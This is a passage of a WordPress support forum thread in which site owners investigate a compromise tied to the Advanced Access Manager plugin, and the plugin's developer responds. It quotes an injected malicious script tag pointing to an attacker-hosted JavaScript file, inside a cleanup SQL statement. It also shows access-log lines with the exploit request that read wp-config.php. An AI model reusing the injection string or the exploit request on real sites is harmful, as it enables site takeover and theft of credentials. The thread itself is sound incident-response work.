Hack

  • Resolved keyvan21

    (@keyvan21)


    5 years, 2 months ago

    hello
    i open my website today, and see all of my pages redirect to deleted
    help me plz…!
    thanks

    • This topic was modified 5 years, 2 months ago by Jan Dembowski.
Viewing 15 replies - 31 through 45 (of 51 total)

  • Which version of Advacned Access Manager are you usigg?

    I can confirm that some of my sites were hacked even without Advanced Access Manager.

    Thread Starter keyvan21

    (@keyvan21)

    guys thanks all of you for reply’s
    I can’t believe this has happened to so many sites
    What happened to all people was constant use is advanced acces manager
    like me!
    —-
    I deleted this texts from my site but it came back after 1 day. like 2 other people witch reply this post

    next step is delete advanced acces manager…

    get in touch together for solve this hell! thanks all

    In my case I had to use this sql, because the hacker injected his script into posts a couple of times:

    
Update [your_prefix]_posts SET post_content = REPLACE(post_content, "<script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script>" , "") WHERE post_content like "%<script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script>%";
    • This reply was modified 5 years, 2 months ago by clivio.

    My Advanced Access Manager Version is 5.9.8.1 (installed last week):

    I made a mixed update of my plugin list from other infected websites:

    Adminimize
    All in One Seo
    Advanced Access Manager
    Advanced Custom Fields
    CommerceGurus Toolkit
    Customizable Post Listings
    Contact Form 7
    Duplicate Page
    .html on Pages
    Jquery Validation For Contact Form 7
    KB Linker
    LayerSlider WP
    MailChimp for WordPress
    More Fields
    Multi-level Navigation Plugin
    Redux Framework
    Really Simple Sitemap
    Recent Posts
    SEO Smart Links
    Table of Contents Plus
    Widget CSS Classes
    WP-PostRatings
    WP Fastest Cache
    WP Live Chat Support
    WP Simple Ads Insertion
    WPBakery Visual Composer
    WPFront User Role Editor
    Yoast SEO

    • This reply was modified 5 years, 2 months ago by marc77.

    @karelnet

    I can confirm that some of my sites were hacked even without Advanced Access Manager.

    Well, I have Advanced Access Manager on only 1 website but 6 websites got hacked. The problem for me was, that my SQL Password was the same for all 6 websites. Do you have different sql passwords for all your sites or are they in one account? Please check your wp-config.php

    Off course I have set different PW′s now for all sites. It was a dump mistake.

    • This reply was modified 5 years, 2 months ago by marc77.
    • This reply was modified 5 years, 2 months ago by marc77.

    @marc77 Yes I have different MySQL passwords for websites. But all DB are on the same server. I’d find strange they could have access to all databases with different usernames/pass from one site ?
    To be sure, I changed the root password…

    I checked the logs. There was a SQL insertation on my websites at: [07/Sep/2019:00:02:20 +0200]

    I my access.log I found arround this time:

    Here is the IP – [07/Sep/2019:00:01:39 +0200] “GET /wp-config.php?aam-media=1 HTTP/1.0″ 301 254 “-” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0”

    Please see the get command: aam-media=1

    Maybe aam-media stands for Advanced Access Manager?

    And here comes from the same IP the next get commands from the access.log:

    here is the same ip – – [07/Sep/2019:00:01:54 +0200] “POST /wp-login.php HTTP/1.0” 401 381 “/wp-admin/admin-ajax.php” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36”

    here is the same ip – – [07/Sep/2019:00:01:57 +0200] “GET /wp-admin/profile.php HTTP/1.0” 301 249 “/wp-admin/profile.php” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36”

    here is the same ip – – [07/Sep/2019:00:01:58 +0200] “GET /wp-admin/profile.php HTTP/1.0” 302 – “/wp-admin/profile.php” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36”

    here is the same ip – – [07/Sep/2019:00:01:58 +0200] “GET /wp-login.php?redirect_to=https%3A%2F%2F%2Fwp-admin%2Fprofile.php&reauth=1 HTTP/1.0” 401 381 “/wp-admin/profile.php” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36”

    That means after open the URL:

    /wp-config.php?aam-media=1 with a 301 redirect

    they made a post command to the

    /wp-login.php HTTP/1.0″ 401 381 “/wp-admin/admin-ajax.php”

    and then:

    he update the Profile?

    GET /wp-admin/profile.php HTTP/1.0″ 302 – “/wp-admin/profile.php”

    https%3A%2F%2F%2Fwp-admin%2Fprofile.php&reauth=1

    reauth=1 means they changed the password, right?

    • This reply was modified 5 years, 2 months ago by marc77.
    • This reply was modified 5 years, 2 months ago by marc77.
    • This reply was modified 5 years, 2 months ago by marc77.
    • This reply was modified 5 years, 2 months ago by marc77.
    • This reply was modified 5 years, 2 months ago by marc77.
    • This reply was modified 5 years, 2 months ago by marc77.

    Yes, it stands for Advaned Access Manager.

    Please check my updates in the previous post.

    • This reply was modified 5 years, 2 months ago by marc77.

    Can you share the IP marc77? I would check in my logs.

    @karelnet

    I’d find strange they could have access to all databases with different usernames/pass from one site ?

    yes, this is really strange. Maybe you have the same wp-login account + pw?

    Ok, at 3 O′clock the second IP open myphpadmin:

    50.63.162. – – [07/Sep/2019:00:03:05 +0200] “GET /phpmyadmin HTTP/1.0” 200 55883 “https://myurl/phpmyadmin&#8221; “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0”

    I invited the developer:

    https://www.ads-software.com/support/topic/maybe-advanced-access-manager-is-vulnerable/

    • This reply was modified 5 years, 2 months ago by marc77.
    • This reply was modified 5 years, 2 months ago by marc77.
    • This reply was modified 5 years, 2 months ago by marc77.

    Hi !

    I have the same issue, impossible to access my all website !! In practice, how do you escape from this hack ???

    Regards
    Amelie

    Hello guys,

    I’m the primary developer for the Advanced Access Manager. Few days ago I’ve got anonymous feedback that there is a vulnerability in the plugin that allows to information about website through Media Access feature. The vulnerability was covered within couple hours from the time it was reported. The release 5.9.9 contained the fix and release 5.9.9.1 added additional enforcements to cover all possible cases.

    AAM itself does not have the ability to change physical file integrity or perform SQL injections, so it definitely a combination of plugins.

    These are the following steps that you can perform to eliminate any further issues:

    1. Make sure that your website database is not publicly accessible (only from the website hosting box);
    2. Regenerate salts in your wp-config.php file with this URL https://api.www.ads-software.com/secret-key/1.1/salt/;
    3. Keep all your plugins and WordPress core up-to-date;

    Regards,
    Vasyl

Viewing 15 replies - 31 through 45 (of 51 total)
  • The topic ‘Hack’ is closed to new replies.

Tags